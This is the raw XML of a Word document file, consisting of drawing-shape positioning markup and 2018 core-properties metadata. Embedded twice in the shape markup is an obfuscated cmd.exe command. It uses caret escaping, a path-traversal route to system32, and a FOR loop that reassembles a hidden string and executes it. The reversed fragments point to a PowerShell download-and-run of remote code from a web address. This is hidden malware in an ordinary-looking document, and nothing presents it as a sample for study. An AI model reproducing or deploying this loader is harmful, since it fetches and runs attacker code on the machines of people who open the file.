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AEEA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1685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7575</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-904875</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="210185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:\vQuaKjEQD\jQvpHrSmi\EwODivQoLmM\..\..\..\windows\system32\cmd.exe /c c^m^D, ,  /v:O^    , , /r  " , , , (  ,   (sE^t ^  2C=jc^ oW tc W^h hG i^z  y Z9 pX G7 Y^7^ ^28 m^H^ xV jF ^Hu xg Kf^}J^Y}g5{^k9hPXcTXtk2^aCzc^AN}^i^Y}^ ckwJa1Ue^f^MrpLb^l^g;qs^tM4Xb^ZFy1$Ia^ 1hsO^Ks^s^m^erSca^7ozwrXoP^MI-CZt^03rp^Za7ktm^eSO3;Y^P^)QStlTXxvFZ^w^$ Q^(GFeudl^XniOAfv6o^XktMVeVLvAd^aPNs^uq^.QiU^stJPXwTx$do;^I ^)^0qy ^bd^Z^T^onL^B7ieo^1szjn^hl^o^U^dpGVso^TeY^mrO^P.U1^q6pbCk^m^4V^$Q9^(^eHedStc^jiaAr^BXww^i.NkUD^jJEew^a^I$^0w^;K611R V1=^bx^ ^4TeT^hpnGyzot^gb.^6FU7^jJO^8^w^m^F$I^X;Ak^)t4^(lZnu^te7Pp40o1^o^.TuUsyJfmw9^0$co{3N ^2P^)l^A0h703^a28^u L^5qaue4^l-fC^ 2UsDd^uOft6raVp^t7N^S^tT.uO^qoEb8j^mOK$I^t^(vc  ^H^fzJI^wO^;1^o^)V^p^(^Bzd^f^dnf^8eJEs9^2^.zKq^3^QbC^jmWV$9X^;EM^)CQ0VA^,Nb^hK^W^kDCXfc$9J,P7'^m^SThZE30^GF7^'I^P^(i nceec^Kp^3zo^bL.beq^JXb^lum^HI$^Q^p{c^P^y^i8r^mntT6{nt^)^4^BlfTQR2TAG^$vC E7nA^Pi84 c^DhHGkgxX8B$z^y^(sx^h^UOcsn^agqeN0r^eCo^6^1^fml^;CY'^9^3mmWapGeaZrt^P^tXzsJW.2MbBfd E^oo^EdL^Y^aFU'1Q 10^m4b^o^DEc^Xy^-Z^A 81^tm^bc^XYe^a4^j24bW^lO^96^- ^E^w^M^heFfNxi^ cR=j7^ ^63USuJ8Tw0R$F^f^;M^1'pzp^ywtl^WtQa^ht^6^lqamGNxm^j.g62K^wlAQ^maKx^OV^sv^5^mm^A'gn 4Smd1oW6ce^O-^D^9^ ^9J^teYcJ^X^eLBjO^1b7u^O^0M-p^H^w^Bz^epUN^Sy=D^O RZqNebr^3mP^g^$^Ia;9G^)^Lb^'lfetNx^do^e9B^.^GjoWr^M^T^2u1e\^e^E'^Th+^b9^)Ja^(nUhc^2t^l^han^2P^92pj^gm^KDeO^LTpQt^PI^epiG^FA:BR:JR]wsh1^Tt^YVa^JgPM4^.e^m^OQ9ILm.^AYm^D^BeiT^t8 sr8^yP4S^uo[^TP^(^U7^=INtW1XZxFqy$^xV;17^)6r'3i@NV'PZ^(p^GtWs^ieYlir^pYeS^On^.7Y'Dpd^w4o^Dxb^uK.hQ0qF1ueor^2zRci^FGmYI^=EM^lV9?^St^pV^g^h4^PpR^b.Y9sfl^e3CnOvi^A4u pqWt/UwWCWYxQLt1/76mWuos7csz^.^yje9Mg^Y0nNboj6^mFUehN^lRtoT^6rJAoev/SK/4e^:^pUpv0tEYtj^4hbE'DC=^L6lgLQbyT y^$8g^;^St'pwVg^L^aldi69^'GR=D^bXI^OmfWT^sw$ld ^iglJW^lCDe^wH^h42^s^1ErD^oew^2wcQ^o^xGp) ,  )&amp;&amp;   ,  FOr,  , ,  /^L  , ,  , %w , ,IN , ,  (  ^ ^1301 ^ ^ , ^,^ ^,   ,  ^, ^-3^,^ +2 ,^, ,^  , ) , D^o , ,, ( , ^Set Z^qi=!Z^qi!!2C:~   %w, 1!)&amp;&amp;  , , i^F  ,%w , , ,    , ^eQU,^2  ,( , , (C^A^ll  , , ,%Z^qi:*^Z^qi!=%   ) ,  )   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-71.25pt;mso-position-vertical-relative:text;margin-left:-7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:\vQuaKjEQD\jQvpHrSmi\EwODivQoLmM\..\..\..\windows\system32\cmd.exe /c c^m^D, ,  /v:O^    , , /r  " , , , (  ,   (sE^t ^  2C=jc^ oW tc W^h hG i^z  y Z9 pX G7 Y^7^ ^28 m^H^ xV jF ^Hu xg Kf^}J^Y}g5{^k9hPXcTXtk2^aCzc^AN}^i^Y}^ ckwJa1Ue^f^MrpLb^l^g;qs^tM4Xb^ZFy1$Ia^ 1hsO^Ks^s^m^erSca^7ozwrXoP^MI-CZt^03rp^Za7ktm^eSO3;Y^P^)QStlTXxvFZ^w^$ Q^(GFeudl^XniOAfv6o^XktMVeVLvAd^aPNs^uq^.QiU^stJPXwTx$do;^I ^)^0qy ^bd^Z^T^onL^B7ieo^1szjn^hl^o^U^dpGVso^TeY^mrO^P.U1^q6pbCk^m^4V^$Q9^(^eHedStc^jiaAr^BXww^i.NkUD^jJEew^a^I$^0w^;K611R V1=^bx^ ^4TeT^hpnGyzot^gb.^6FU7^jJO^8^w^m^F$I^X;Ak^)t4^(lZnu^te7Pp40o1^o^.TuUsyJfmw9^0$co{3N ^2P^)l^A0h703^a28^u L^5qaue4^l-fC^ 2UsDd^uOft6raVp^t7N^S^tT.uO^qoEb8j^mOK$I^t^(vc  ^H^fzJI^wO^;1^o^)V^p^(^Bzd^f^dnf^8eJEs9^2^.zKq^3^QbC^jmWV$9X^;EM^)CQ0VA^,Nb^hK^W^kDCXfc$9J,P7'^m^SThZE30^GF7^'I^P^(i nceec^Kp^3zo^bL.beq^JXb^lum^HI$^Q^p{c^P^y^i8r^mntT6{nt^)^4^BlfTQR2TAG^$vC E7nA^Pi84 c^DhHGkgxX8B$z^y^(sx^h^UOcsn^agqeN0r^eCo^6^1^fml^;CY'^9^3mmWapGeaZrt^P^tXzsJW.2MbBfd E^oo^EdL^Y^aFU'1Q 10^m4b^o^DEc^Xy^-Z^A 81^tm^bc^XYe^a4^j24bW^lO^96^- ^E^w^M^heFfNxi^ cR=j7^ ^63USuJ8Tw0R$F^f^;M^1'pzp^ywtl^WtQa^ht^6^lqamGNxm^j.g62K^wlAQ^maKx^OV^sv^5^mm^A'gn 4Smd1oW6ce^O-^D^9^ ^9J^teYcJ^X^eLBjO^1b7u^O^0M-p^H^w^Bz^epUN^Sy=D^O RZqNebr^3mP^g^$^Ia;9G^)^Lb^'lfetNx^do^e9B^.^GjoWr^M^T^2u1e\^e^E'^Th+^b9^)Ja^(nUhc^2t^l^han^2P^92pj^gm^KDeO^LTpQt^PI^epiG^FA:BR:JR]wsh1^Tt^YVa^JgPM4^.e^m^OQ9ILm.^AYm^D^BeiT^t8 sr8^yP4S^uo[^TP^(^U7^=INtW1XZxFqy$^xV;17^)6r'3i@NV'PZ^(p^GtWs^ieYlir^pYeS^On^.7Y'Dpd^w4o^Dxb^uK.hQ0qF1ueor^2zRci^FGmYI^=EM^lV9?^St^pV^g^h4^PpR^b.Y9sfl^e3CnOvi^A4u pqWt/UwWCWYxQLt1/76mWuos7csz^.^yje9Mg^Y0nNboj6^mFUehN^lRtoT^6rJAoev/SK/4e^:^pUpv0tEYtj^4hbE'DC=^L6lgLQbyT y^$8g^;^St'pwVg^L^aldi69^'GR=D^bXI^OmfWT^sw$ld ^iglJW^lCDe^wH^h42^s^1ErD^oew^2wcQ^o^xGp) ,  )&amp;&amp;   ,  FOr,  , ,  /^L  , ,  , %w , ,IN , ,  (  ^ ^1301 ^ ^ , ^,^ ^,   ,  ^, ^-3^,^ +2 ,^, ,^  , ) , D^o , ,, ( , ^Set Z^qi=!Z^qi!!2C:~   %w, 1!)&amp;&amp;  , , i^F  ,%w , , ,    , ^eQU,^2  ,( , , (C^A^ll  , , ,%Z^qi:*^Z^qi!=%   ) ,  )   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34:00Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-23T10:34:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>